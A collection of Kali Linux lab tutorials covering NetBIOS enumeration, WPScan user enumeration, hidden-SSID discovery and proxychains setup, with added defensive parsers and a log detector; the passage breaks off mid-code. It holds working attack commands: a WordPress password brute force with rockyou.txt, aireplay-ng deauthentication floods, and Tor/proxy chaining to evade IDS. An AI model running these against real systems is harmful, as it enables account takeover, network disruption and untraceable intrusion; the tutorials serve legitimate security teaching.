NetBIOS Enumeration With Nmap, NBTScan & nbtstat

NetBIOS Enumeration With nmap & nbtstat

NetBIOS Enumeration

With NetBIOS enumeration we can scan a local area network, or a specific target on the intranet, and extract NetBIOS information from it, such as:

  • Devices that belong to a domain
  • Storage shares on the network
  • Domain policies and passwords
  • Printers on the network
  • Group information and users

NetBIOS

NetBIOS stands for Network Basic Input Output System and allows communication between applications running on different systems within a LAN.

The service uses a 16-character ASCII string to identify a device on a local network.

The first 15 characters identify the device; the 16th character identifies the service.

Services and ports:

  • UDP/137 Name service
  • UDP/138 Datagram service
  • TCP/139 Session service

In this quick guide I am using nmap and nbtstat on Windows, and NBTScan on Kali Linux. NBTScan can also be run on Windows if you want to try it there.

Several other NetBIOS enumeration tools exist for all platforms if you wish to try some of them.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Common NetBIOS Name Table (NBT) names

NetBIOS Code           Type     Information
<00>                   UNIQUE   Hostname
<00>                   GROUP    Domain name
<hostname><03>         UNIQUE   Messenger service
<username><03>         UNIQUE   Logged-in user
<20>                   UNIQUE   File Server Service
<21>                   UNIQUE   RAS Client Service
<22>                   UNIQUE   Microsoft Exchange
<1B>                   UNIQUE   Domain Master Browser
<1C>                   GROUP    Domain Controllers
<1D>                   GROUP    Master Browser
<INet~Services>        GROUP    IIS

Requirements

  • Kali Linux
  • NBTScan
  • Nmap
  • Windows AD
  • Windows client on the same LAN as the Windows AD

Step 1: NetBIOS Enumeration With nbtstat in Windows

Open a command prompt in Windows and type the following command.

nbtstat -A 192.168.100.11

Ethernet0:
Node IpAddress: [192.168.100.12] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    ONLINE-IT      <00>  GROUP       Registered
    SRV1           <00>  UNIQUE      Registered
    ONLINE-IT      <1C>  GROUP       Registered
    SRV1           <20>  UNIQUE      Registered
    ONLINE-IT      <1B>  UNIQUE      Registered

    MAC Address = 01:0c:29:3c:83:4e


Npcap Loopback Adapter:
Node IpAddress: [169.254.33.233] Scope Id: []

    Host not found.

C:\>
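The name-table output above is what every tool in this guide ultimately reads: one record per name, a 16th-byte suffix, and a UNIQUE/GROUP type. The following parser is an added example, not code from the guide or from nbtstat/NBTScan; it turns such a table into the facts an enumerator (or a defender reviewing what a host advertises) learns from it, using the suffix meanings from the table earlier in this guide. The sample table is copied from the Step 1 output; the `nbtscan -v` format, which omits the status column, is handled by the same regex.

```python
import re

# Suffix meanings taken from the name-table summary in this guide:
# (16th-byte value, record type) -> what the record tells an enumerator.
NBT_SUFFIXES = {
    (0x00, "UNIQUE"): "Hostname",
    (0x00, "GROUP"): "Domain name",
    (0x03, "UNIQUE"): "Messenger service / logged-in user",
    (0x20, "UNIQUE"): "File Server Service",
    (0x21, "UNIQUE"): "RAS Client Service",
    (0x22, "UNIQUE"): "Microsoft Exchange",
    (0x1B, "UNIQUE"): "Domain Master Browser",
    (0x1C, "GROUP"): "Domain Controllers",
    (0x1D, "GROUP"): "Master Browser",
}

# One record line of an "nbtstat -A" table, e.g.
#     ONLINE-IT      <1C>  GROUP       Registered
# "nbtscan -v" prints the same fields without the status column, so it is optional.
RECORD_RE = re.compile(
    r"^\s*(?P<name>\S{1,15})\s+<(?P<suffix>[0-9A-Fa-f]{2})>\s+"
    r"(?P<type>UNIQUE|GROUP)(?:\s+(?P<status>\w+))?\s*$"
)


def parse_name_table(text):
    """Parse nbtstat/nbtscan name-table output into a list of record dicts."""
    records = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # header, separator, MAC line or blank line
        suffix = int(m.group("suffix"), 16)
        rtype = m.group("type")
        records.append({
            "name": m.group("name"),
            "suffix": suffix,
            "type": rtype,
            "status": m.group("status") or "",
            "role": NBT_SUFFIXES.get((suffix, rtype), "unknown"),
        })
    return records


def summarize(records):
    """Reduce the records to what is actually learned about the host."""
    summary = {"hostname": None, "domain": None, "roles": set()}
    for r in records:
        if r["suffix"] == 0x00 and r["type"] == "UNIQUE":
            summary["hostname"] = r["name"]
        elif r["suffix"] == 0x00 and r["type"] == "GROUP":
            summary["domain"] = r["name"]
        elif r["role"] != "unknown":
            summary["roles"].add(r["role"])
    return summary


# Sample input: the nbtstat -A table from Step 1 of this guide.
SAMPLE_NBTSTAT = """\
       Name               Type         Status
    ---------------------------------------------
    ONLINE-IT      <00>  GROUP       Registered
    SRV1           <00>  UNIQUE      Registered
    ONLINE-IT      <1C>  GROUP       Registered
    SRV1           <20>  UNIQUE      Registered
    ONLINE-IT      <1B>  UNIQUE      Registered

    MAC Address = 01:0c:29:3c:83:4e
"""

if __name__ == "__main__":
    recs = parse_name_table(SAMPLE_NBTSTAT)
    for r in recs:
        print(f"{r['name']:<16}<{r['suffix']:02X}> {r['type']:<7} {r['role']}")
    print(summarize(recs))
```

Running it on the sample shows why a single `nbtstat -A` is enough to identify SRV1 as a domain controller, file server and domain master browser for ONLINE-IT, which is exactly the information disabling NetBIOS over TCP/IP (see the conclusion) keeps off the wire.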

Step 2: NetBIOS Enumeration With NBTScan

NBTScan is by default installed on Kali Linux, but there is a Windows version as well.

NOTE: On Windows the tool must be run from a command prompt.

We can use the tool to scan a whole network or just one target.

C:\NBTScan>nbtscan.exe  192.168.100.11-254

Doing NBT name scan for addresses from 192.168.100.11-254

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
192.168.100.11   SRV1             <server>  <unknown>        01:0c:29:3c:83:4e
192.168.100.12   SRV2             <server>  <unknown>        01-0a-49-67-b8-01

C:\NBTScan>

Adding the verbose option (-v) extracts more information.

C:\NBTScan>nbtscan.exe -v 192.168.100.11

Doing NBT name scan for addresses from 192.168.100.11


NetBIOS Name Table for Host 192.168.100.11:

Incomplete packet, 191 bytes long.
Name             Service          Type
----------------------------------------
ONLINE-IT        <00>              GROUP
SRV1             <00>             UNIQUE
ONLINE-IT        <1c>              GROUP
SRV1             <20>             UNIQUE
ONLINE-IT        <1b>             UNIQUE

Adapter address: 01:0c:29:3c:83:4e
----------------------------------------

C:\NBTScan>

You can find more arguments in NBTScan's official documentation.

Step 3: NetBIOS Enumeration With Nmap Scripting Engine

To run the nbstat.nse script, open Nmap and run the following command.

nmap -sV 192.168.100.11 --script nbstat.nse -v

Host script results:
| nbstat: NetBIOS name: SRV1, NetBIOS user: <unknown>, NetBIOS MAC: 01:0c:29:3c:83:4e (VMware)
| Names:
|   ONLINE-IT<00>        Flags: <group><active>
|   SRV1<00>             Flags: <unique><active>
|   ONLINE-IT<1c>        Flags: <group><active>
|   SRV1<20>             Flags: <unique><active>
|_  ONLINE-IT<1b>        Flags: <unique><active>

NSE: Script Post-scanning.
Initiating NSE at 17:50
Completed NSE at 17:50, 0.00s elapsed
Initiating NSE at 17:50
Completed NSE at 17:50, 0.00s elapsed
Read data files from: C:\Program Files (x86)\Nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 141.97 seconds
           Raw packets sent: 1033 (45.436KB) | Rcvd: 1011 (41.756KB)

Conclusion

As we can see, it is easy to extract information with NetBIOS enumeration techniques and tools.

We have used tools on both Windows and Linux and scanned an AD server on the domain.

The countermeasure against NetBIOS enumeration is to disable the service; however, some old applications still rely on NetBIOS communication.

Check out the Ethical Hacking notes for more Kali Linux quick guides.




WPScan

WordPress Enumeration with WPScan

WPScan is a vulnerability scanner that comes preinstalled with Kali Linux, but can be installed on most Linux distros.

The tool can be used to scan WordPress installations for vulnerabilities and security issues.

You can download the Turnkey image from here.

In this tutorial I am using WPScan to enumerate a WordPress website running on a Linux lab server: a Turnkey Linux image with WordPress preinstalled, running on VMware Workstation.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.

Requirements

  • Kali Linux
  • WordPress Website

Step 1: WPScan Syntax

1.1 Update WPScan vulnerabilities database.

wpscan --update

1.2 Scan a website for vulnerabilities; you can use either a host name or an IP address.

wpscan --url 172.168.200.140

wpscan --url www.wordpress.local

NOTE: If you run WPScan on a website that is not running WordPress you will be notified in the output that the remote site is up, but not running WordPress.

_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.6.0
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________


Scan Aborted: The remote website is up, but does not seem to be running WordPress.
root@iPhone:~#

1.3 Enumerate plugins

wpscan --url www.wordpress.local --enumerate p

1.4 Scan custom directory

wpscan --url www.wordpress.local --wp-content-dir custom-content

1.5 Enumerate themes

wpscan --url www.wordpress.local --enumerate t

1.6 Stealth Scan

wpscan --url www.wordpress.local --stealthy

1.7 Enumerate users: scan the target site for WordPress authors and usernames.

wpscan --url www.wordpress.local --enumerate u

[i] User(s) Identified:

[+] admin
 | Detected By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] testuser
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)


[+] Finished: Thu Jul 18 15:09:44 2019
[+] Requests Done: 16
[+] Cached Requests: 42
[+] Data Sent: 3.339 KB
[+] Data Received: 26.85 KB
[+] Memory used: 102.207 MB
[+] Elapsed time: 00:00:01
root@iPhone:~#

NOTE: You can limit how many usernames WPScan will enumerate.


Step 2: Brute Force WordPress Account Password

2.1 We can use WPScan to brute force a WordPress account.

To run the attack we need a password wordlist; there is one called "rockyou.txt" in Kali Linux.

You can find it in "/usr/share/wordlists/".

Type the command into the terminal to brute force the password for a user (the option names below are the WPScan 2.x ones; WPScan 3.x calls them --usernames, --passwords and --max-threads):

wpscan --url [wordpress url] --wordlist [path to wordlist] --username [username] --threads [number of threads]

wpscan --url www.wordpress.local --wordlist /usr/share/wordlists/rockyou.txt --username testuser --threads 2

NOTE: Eventually, you should see the password listed in the terminal next to the login ID of the user.

Step 3: Optional

3.1 Use WPScan with Tor and proxychains; for more information on how to set up Tor and proxychains, please check out our notes.

NOTE: You need to start the Tor service before running the command.

proxychains wpscan --url www.wordpress.local

Conclusion

As we can see, it is very easy for an attacker to scan a WordPress site and brute force an account.

To avoid WordPress enumeration and brute force attacks, use WordPress plugins that limit the number of login attempts for a specific username and IP address.

Furthermore, administrators should avoid using usernames as nicknames and display names; display names are shown in WordPress and are easy to scan.

WPScan scans the site's URLs for usernames, so if the administrator account is not used for publishing, WPScan will not find it.
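The countermeasures above are easier to prioritise when you can see the enumeration in your own logs. The following detector is an added example (not part of this tutorial and not WPScan's code) that reads web server access log lines and flags the two behaviours visible in the output above: walking author IDs, which WPScan reports as "Author Id Brute Forcing", and repeated login attempts. It assumes a standard WordPress install, where `/?author=N` redirects to the author archive and a failed login to `/wp-login.php` re-renders the form with HTTP 200 while a successful one redirects; the log lines are constructed and use documentation-range IP addresses.

```python
import re
from collections import defaultdict

# Common-log-format line: client, identity, user, [timestamp], "request", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Assumed standard WordPress endpoints: /?author=N leaks the author's login name
# through the archive redirect, and wp-login.php handles password attempts.
AUTHOR_RE = re.compile(r"^/\?author=(\d+)$")
LOGIN_PATH = "/wp-login.php"


def parse_access_log(lines):
    """Yield one dict per parseable log line; silently skip malformed lines."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def detect_wp_recon(lines, author_threshold=3, login_threshold=5):
    """Return {client_ip: [finding, ...]} for clients whose requests look like
    WPScan-style user enumeration or password brute forcing."""
    author_ids = defaultdict(set)   # ip -> author ids probed
    failed_logins = defaultdict(int)  # ip -> failed POSTs to wp-login.php
    for rec in parse_access_log(lines):
        m = AUTHOR_RE.match(rec["path"])
        if m:
            author_ids[rec["ip"]].add(int(m.group(1)))
        elif rec["method"] == "POST" and rec["path"] == LOGIN_PATH and rec["status"] == "200":
            # A failed login re-renders the form (200); success redirects (302).
            failed_logins[rec["ip"]] += 1

    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= author_threshold:
            findings[ip].append(
                f"author-id enumeration: {len(ids)} ids probed ({min(ids)}-{max(ids)})")
    for ip, n in failed_logins.items():
        if n >= login_threshold:
            findings[ip].append(f"login brute force: {n} failed POSTs to {LOGIN_PATH}")
    return dict(findings)


# Constructed sample log: one scanner (203.0.113.7) and one normal visitor (198.51.100.9).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Jul/2019:15:09:40 +0200] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.7 - - [18/Jul/2019:15:09:40 +0200] "GET /?author=2 HTTP/1.1" 301 0
203.0.113.7 - - [18/Jul/2019:15:09:41 +0200] "GET /?author=3 HTTP/1.1" 404 1234
203.0.113.7 - - [18/Jul/2019:15:09:41 +0200] "GET /?author=4 HTTP/1.1" 404 1234
203.0.113.7 - - [18/Jul/2019:15:09:42 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
203.0.113.7 - - [18/Jul/2019:15:09:42 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
203.0.113.7 - - [18/Jul/2019:15:09:42 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
203.0.113.7 - - [18/Jul/2019:15:09:43 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
203.0.113.7 - - [18/Jul/2019:15:09:43 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
203.0.113.7 - - [18/Jul/2019:15:09:43 +0200] "POST /wp-login.php HTTP/1.1" 200 3100
198.51.100.9 - - [18/Jul/2019:15:10:02 +0200] "GET /about/ HTTP/1.1" 200 5120
198.51.100.9 - - [18/Jul/2019:15:10:10 +0200] "POST /wp-login.php HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for ip, notes in detect_wp_recon(SAMPLE_LOG.splitlines()).items():
        for note in notes:
            print(f"{ip}: {note}")
```

The thresholds are deliberately low for the sample; in production you would evaluate them per time window, and the same per-IP counters are what a login-limiting plugin enforces on the server side.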

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use it for illegal activity. The author is not responsible for the use of the application or the users action.




Uncover Hidden SSID

How To Uncover Hidden SSID With Kali Linux

In this quick lab we will go through how to uncover a hidden SSID with Kali Linux and a wireless card that can be set to monitor mode.

SSID is short for service set identifier. The SSID is the sequence of characters that uniquely identifies a wireless local area network; the name can be up to 32 alphanumeric characters and is case sensitive.

By default an access point is configured to broadcast the SSID in a beacon frame, which allows clients to discover it easily.

Some network administrators disable SSID broadcasting in the configuration, which tells the access point not to include the SSID in the beacon frame. This is done in the belief that it adds one more security layer to the network: the effect of not sending out the SSID is that only devices that know the SSID can connect to the network.

Unfortunately hiding the SSID does not add any extra security layer to the WLAN. There are many different methods to uncover a hidden SSID, and Windows and Android tools can discover hidden SSIDs automatically, so hiding the SSID should not be considered an extra security layer.

Requirements

I am using an old D-Link router with SSID broadcast disabled; the wireless card I am using is my 8-year-old AWUS036H.

DISCLAIMER: This software/tutorial is for educational purposes only. Please don’t use for illegal activity. The author is not responsible for the use of the application or the users action.

Step 1: Set Wireless card in monitor mode

1.1 Display wireless card name

sudo iwconfig

eth0      no wireless extensions.

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Here we can see that my wireless card is called wlan0.

1.2 Kill interfering processes

sudo airmon-ng check kill

1.3 Put the interface into monitor mode. This can be achieved in different ways; I am using airmon-ng to start the card in monitor mode.

sudo airmon-ng start wlan0

NOTE: The command will create a new virtual interface with the same name as your old interface plus the word mon.

1.4 Display the wireless cards again to confirm the new interface.

sudo iwconfig 

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
eth0      no wireless extensions.

lo        no wireless extensions.

root@iPhone:~# 

Step 2: Scan for available networks

2.1 Use airodump-ng to scan for nearby networks and look for your router. I know that my BSSID is 84:C9:B2:6A:9E:90 and that I am using channel 6.

sudo airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -29      144       11    0   6  130  WPA2 CCMP   PSK  <length:  0>                   
 F0:9F:C2:AA:6C:B9  -47       45        0    0   1  195  WPA2 CCMP   PSK  Perham                         
 32:CD:A7:15:AD:49  -49       29        0    0   6  54e  WPA2 CCMP   PSK  DIRECT-SoM2020 Series          
 BC:EE:7B:7E:18:90  -49      124       12    0   9  195  WPA2 CCMP   PSK  nocco1                         
 80:2A:A8:44:C5:B1  -51       76        3    0   1  195  WPA2 CCMP   PSK  PontuS                         
 82:2A:A8:44:C5:B1  -51       63        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                   
 F2:9F:C2:AA:6C:B9  -47       51        0    0   1  195  WPA2 CCMP   PSK  <length:  0>                    
 08:86:3B:DD:2C:95  -54       20        4    0   1  130  WPA2 CCMP   PSK  belkin.24d        

I can see that the first network has no SSID ("<length: 0>") and that it matches my BSSID and channel.
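The "<length: 0>" airodump-ng prints comes straight from the SSID information element in the beacon frame, and the same element in a probe response carries the real name. The parser below is an added example, not part of this lab or of the aircrack-ng suite: it walks the tagged parameters of an 802.11 management frame body (1-byte element id, 1-byte length, value), reports the SSID the way airodump-ng does, and also reads the channel from the DS Parameter Set element. The three frame bodies are constructed, not captured; the name HoneyP01 and channel 6 match the lab network.

```python
SSID_ELEMENT_ID = 0        # 802.11 information element id for the SSID
DS_PARAMETER_SET_ID = 3    # carries the channel number


def parse_tagged_parameters(body):
    """Walk the tagged parameters of a beacon or probe-response body:
    a sequence of (element id, length, value) TLVs."""
    elements = []
    i = 0
    while i + 2 <= len(body):
        eid, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            break  # truncated frame: stop rather than mis-read the tail
        elements.append((eid, bytes(value)))
        i += 2 + length
    return elements


def extract_ssid(body):
    """Return (ssid_or_None, display). The display string mimics airodump-ng:
    the name, or <length: N> when the access point hides it."""
    for eid, value in parse_tagged_parameters(body):
        if eid != SSID_ELEMENT_ID:
            continue
        # Two common ways an AP hides its name: a zero-length SSID element,
        # or an element of the real length filled with NUL bytes.
        if len(value) == 0 or all(b == 0 for b in value):
            return None, f"<length: {len(value):2d}>"
        name = value.decode("utf-8", errors="replace")
        return name, name
    return None, "<no SSID element>"


def extract_channel(body):
    """Channel from the DS Parameter Set element, or None if absent."""
    for eid, value in parse_tagged_parameters(body):
        if eid == DS_PARAMETER_SET_ID and len(value) == 1:
            return value[0]
    return None


def ie(eid, value):
    """Build one information element (used only to construct the samples)."""
    return bytes([eid, len(value)]) + value


# Constructed frame bodies: tagged parameters only, no fixed fields or radiotap header.
SUPPORTED_RATES = ie(1, bytes([0x82, 0x84, 0x8B, 0x96]))   # 1, 2, 5.5, 11 Mbit/s (basic)
DS_CHANNEL_6 = ie(DS_PARAMETER_SET_ID, bytes([6]))

HIDDEN_BEACON = ie(SSID_ELEMENT_ID, b"") + SUPPORTED_RATES + DS_CHANNEL_6
NULL_FILLED_BEACON = ie(SSID_ELEMENT_ID, b"\x00" * 8) + SUPPORTED_RATES + DS_CHANNEL_6
PROBE_RESPONSE = ie(SSID_ELEMENT_ID, b"HoneyP01") + SUPPORTED_RATES + DS_CHANNEL_6

if __name__ == "__main__":
    for label, body in [("hidden beacon", HIDDEN_BEACON),
                        ("NUL-filled beacon", NULL_FILLED_BEACON),
                        ("probe response", PROBE_RESPONSE)]:
        _, shown = extract_ssid(body)
        print(f"{label:<18} CH {extract_channel(body)}  ESSID {shown}")
```

The hidden beacon and the probe response describe the same access point; only the SSID element differs, which is why any client joining the network gives the name away.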

Now type down the BSSID and the channel of your access point and cancel the current command and rerun it specifying the BSSID and channel of the hidden SSID.

sudo airodump-ng -c 6 --bssid 84:C9:B2:6A:9E:90 wlan0mon

CH  6 ][ Elapsed: 18 s ][ 2019-07-15 20:21 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -25  87      185       35    0   6  130  WPA2 CCMP   PSK  <length:  0>               
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0       21      

We have two options while scanning the network. The first is to wait for a new device to connect: the new device will send out a beacon frame, and airodump-ng will immediately populate the SSID in the terminal output.

I will now connect a device to the network to demonstrate how it will show up in the output.

CH  6 ][ Elapsed: 6 mins ][ 2019-07-15 20:27 ][ paused output                                         
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -24 100     3247      416    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      262                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1      2        6                                       

Observe that the ESSID now shows the name HoneyP01.

The second option is to force-disconnect one or all of the devices associated with the AP. We can use aireplay-ng to disconnect devices by flooding them with de-authentication packets.

2.2 Open a new terminal and send de-authentication packets to all connected devices on the router. The command will send out 5 de-authentication packets to the access point.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 --ignore-negative wlan0mon

20:38:49  Waiting for beacon frame (BSSID: 84:C9:B2:6A:9E:90) on channel 6
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
20:38:49  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:50  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
20:38:51  Sending DeAuth (code 7) to broadcast -- BSSID: [84:C9:B2:6A:9E:90]
root@iPhone:~# 

2.3 Go back to terminal one, now you should see the ESSID of the hidden WLAN.

CH  6 ][ Elapsed: 7 mins ][ 2019-07-15 20:39 ][ paused output                                        
                                                                                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                                                         
 84:C9:B2:6A:9E:90  -16  96     4204      608    0   6  130  WPA2 CCMP   PSK  HoneyP01                   
                                                                                                         
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
                                                                                                         
 84:C9:B2:6A:9E:90  84:C9:B2:6A:9E:90   -1    1 - 0      0      322                                       
 84:C9:B2:6A:9E:90  00:C0:CA:95:EA:8B   -7    0 - 1e     0       37                                

We can refine the attack to target just one associated device by adding a target station to the command.

sudo aireplay-ng -0 5 -a 84:C9:B2:6A:9E:90 -c 00:C0:CA:95:EA:8B --ignore-negative wlan0mon

Conclusion

Uncovering a hidden SSID is easy because, when a device connects to an access point, the device and the access point exchange probe request and response packets, which carry the SSID.

We have covered some basic terminal commands to uncover a hidden SSID. All equipment used in the lab is mine. Please don't perform the commands on unauthorized networks.




Proxychains

How To Use Proxychains Kali Linux

Proxychains

Proxychains is open source software for Linux systems and comes preinstalled with Kali Linux. The tool redirects TCP connections through proxies such as Tor, SOCKS and HTTP(S) proxies, and it allows us to chain proxy servers.

With proxychains we can hide the IP address of the source traffic and evade IDS and firewalls. We can use proxychains in a lot of situations, such as when we want to avoid giving up our IP address while scanning a target or visiting a website.

Furthermore, chaining multiple proxies makes it difficult to track down the source IP address of the TCP connection; the application gives us a way to hide ourselves and stay anonymous. However, proxy servers are likely to log your traffic and have to obey local law and jurisdiction.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.

Step 1: Update/Upgrade & Install Tor

1.1 Upgrade and update the OS.

sudo apt-get update
sudo apt-get upgrade

1.2 Install the tor service.

sudo apt-get install tor

1.3 Start Tor service.

sudo service tor start

1.4 Display Tor service status.

sudo service tor status

NOTE: Tor service needs to run for proxychains to work.

Step 2: Configure Proxychains

2.1 The proxychains configuration file is located in the "/etc/" directory; edit the configuration file.

sudo nano /etc/proxychains.conf

There are three chaining modes proxychains can run in.

  1. strict_chain
  2. dynamic_chain
  3. random_chain

strict_chain: the default option in proxychains. Every connection goes through the proxies in the order they are listed in the configuration file. Strict chaining is best used when you want the source traffic to appear to come from a particular location.

dynamic_chain: works like the strict chain but does not require all the proxies in the configuration file to be working. If a proxy is down, the connection skips to the next proxy server in the list.

random_chain: picks proxies at random from the list in the configuration file, so the chain of proxies looks different to the target each time.

Uncomment the "dynamic_chain" line to enable dynamic chaining.

dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain

NOTE: Uncomment "chain_len" if you are using random_chain; the parameter sets how many proxies from the list are used to build each randomized chain.

2.2 By default proxychains sends traffic through the host at 127.0.0.1 on port 9050. This is the default Tor configuration; if you are planning to use Tor, leave the "defaults set to tor" entry as it is. If you are not using Tor, you will need to comment out this line.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050

2.3 Add proxy servers to the proxychains configuration file. There are free proxy servers on the Internet; I am using free proxies in this lab. You can find them here, and another good site with free proxies is spys.one.

Before adding custom proxies, you can also add Tor SOCKS5 support with "socks5 127.0.0.1 9050".

# meanwile
# defaults set to "tor"
socks4         127.0.0.1 9050

socks5          103.21.161.105 6667
http            156.202.174.101 8080
http            183.76.154.184 8080
http            142.93.130.169 8118
socks5          178.62.59.71 23187
socks5          50.63.26.13 43001

2.4 Prevent DNS leaks: uncomment the "proxy_dns" line below the "Proxy DNS requests - no leak for DNS data" comment.

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
proxy_dns

Exit & Save
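A forgotten `proxy_dns` or a proxy entry proxychains silently ignores defeats the whole point of the chain, and none of that is visible until traffic leaks. The checker below is an added example, not part of this guide or of proxychains itself: it parses a proxychains.conf the way steps 2.1 to 2.4 describe it (a chain-mode keyword, the `proxy_dns` and `chain_len` options, and the `[ProxyList]` block) and lists what a practitioner would want fixed before trusting the file. It assumes the type keywords proxychains matches are the lowercase `http`, `socks4` and `socks5`, so entries copied from free proxy lists, which publish types in uppercase and as "HTTPS", are flagged. The two configurations are constructed with documentation-range addresses: one in the state the file is in before step 2.4, one after the fixes.

```python
import re

CHAIN_MODES = ("strict_chain", "dynamic_chain", "random_chain")
# Type keywords proxychains matches in [ProxyList] (assumed case-sensitive, lowercase).
PROXY_TYPES = ("http", "socks4", "socks5")


def parse_proxychains_conf(text):
    """Return the effective settings of a proxychains.conf: chain modes that are
    uncommented, proxy_dns, chain_len and the proxy list."""
    conf = {"modes": [], "proxy_dns": False, "chain_len": None,
            "proxies": [], "bad_lines": []}
    in_list = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and whitespace
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if in_list:
            parts = line.split()              # type host port [user pass]
            if len(parts) in (3, 5) and parts[2].isdigit():
                conf["proxies"].append(
                    {"type": parts[0], "host": parts[1], "port": int(parts[2])})
            else:
                conf["bad_lines"].append(raw)
            continue
        if line in CHAIN_MODES:
            conf["modes"].append(line)
        elif line == "proxy_dns":
            conf["proxy_dns"] = True
        elif (m := re.match(r"chain_len\s*=\s*(\d+)$", line)):
            conf["chain_len"] = int(m.group(1))
        # other keys (tcp_read_time_out, quiet_mode, ...) do not affect these checks
    return conf


def check_proxychains_conf(text):
    """List the problems to fix before relying on the chain."""
    conf = parse_proxychains_conf(text)
    issues = []
    if not conf["modes"]:
        issues.append("no chain mode uncommented (strict_chain/dynamic_chain/random_chain)")
    elif len(conf["modes"]) > 1:
        issues.append("more than one chain mode uncommented: " + ", ".join(conf["modes"]))
    if not conf["proxy_dns"]:
        issues.append("proxy_dns is commented out: DNS lookups bypass the chain (DNS leak)")
    if "random_chain" in conf["modes"] and conf["chain_len"] is None:
        issues.append("random_chain selected but chain_len is not set")
    if not conf["proxies"]:
        issues.append("[ProxyList] is empty")
    for p in conf["proxies"]:
        if p["type"] not in PROXY_TYPES:
            issues.append(f"unrecognised proxy type '{p['type']}' for {p['host']}:{p['port']}")
    for raw in conf["bad_lines"]:
        issues.append(f"unparseable ProxyList line: {raw.strip()}")
    return issues


# Constructed: the file as it stands before step 2.4, with list entries pasted as published.
WEAK_CONF = """\
dynamic_chain
#strict_chain
#random_chain
#chain_len = 2
# Quiet mode (no output from library)
#quiet_mode
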